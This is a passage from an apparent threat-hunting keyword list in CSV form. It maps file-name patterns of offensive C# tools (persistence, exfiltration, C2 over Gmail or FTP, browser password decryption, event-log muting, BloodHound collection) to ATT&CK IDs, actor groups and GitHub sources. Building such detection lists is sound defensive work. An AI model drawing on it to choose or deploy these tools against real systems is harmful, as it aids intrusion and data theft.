- T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsTriggeEfs.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharPersist*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,1,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*SharPersist.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpEventLoader*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,1,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*SharpEventPersist*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,1,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*SharpEvtMute.cs*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpEvtMute.exe*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpEvtMute.pdb*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpEvtMute.sln*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpExcelibur*,offensive_tool_keyword,cobaltstrike,Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpExcelibur,1,1,N/A,10,10,85,19,2021-07-20T04:56:55Z,2021-07-16T19:48:45Z -*sharp-exec *,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,0,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpExfiltrate.csproj*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrate.exe*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrate.sln*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrateLootCache*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrate-main*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*sharp-fexec *,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,0,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpFtpC2*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,1,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*SharpGen.dll*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*sharpgen.enable_cache*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*sharpgen.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*sharpgen.set_location*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*SharpGmailC2-main*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*SharpGPOAbuse*,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,1,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -*SharpGPOAbuse*,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1204 - T1484 - T1556 - T1574 - T1562,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/FSecureLABS/SharpGPOAbuse,1,1,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -*SharpGPOAbuse.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpGPOAddComputer*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpGPOAddLocalAdmin*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpGPOAddUser*Manager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Sharp-HackBrowserData*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z -*Sharp-HackBrowserData*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*SharpHandler.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpHide.csproj*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide.exe*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide.sln*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide-master*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpHose.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharphound -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpHound-*.zip*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*sharphound*--stealth*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*sharphound.*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHound.cna*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 